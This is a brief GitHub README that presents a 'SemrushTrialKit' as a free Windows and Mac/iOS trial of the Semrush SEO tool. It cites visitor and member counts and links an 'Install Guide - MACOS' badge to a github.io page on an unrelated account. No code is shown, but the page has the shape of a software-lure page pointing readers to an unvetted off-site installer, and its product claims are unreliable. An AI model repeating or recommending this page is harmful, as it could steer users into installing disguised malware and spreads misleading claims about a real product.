SemrushExploreCommunity/.github/README.md

 ![SemrushTrialKit Banner](https://www.stylefactoryproductions.com/wp-content/uploads/2025/04/semrush-free-trial-wordpress.jpg)

 **About SemrushTrialKit**: SemrushTrialKit is a dedicated repository for the free trial version of Semrush on Windows and Mac/iOS, updated September 11, 2025.
 This entry-level package offers core features like keyword tracking and traffic analysis, enhanced by free toolkits with templates and optimization guides.
 Backed by 95K+ visitors and 70K+ members, it enables users to experience tools for content marketing and PPC before premium options.
 Ideal for beginners testing SEO strategies!
-(348 characters)

 <a href="https://olombaris-25.github.io/.github/Semrush" target="_blank">
   <img src="https://img.shields.io/badge/Install_Guide-MACOS-3498db" alt="Install Guide Now" width="230" height="45" style="border:none;">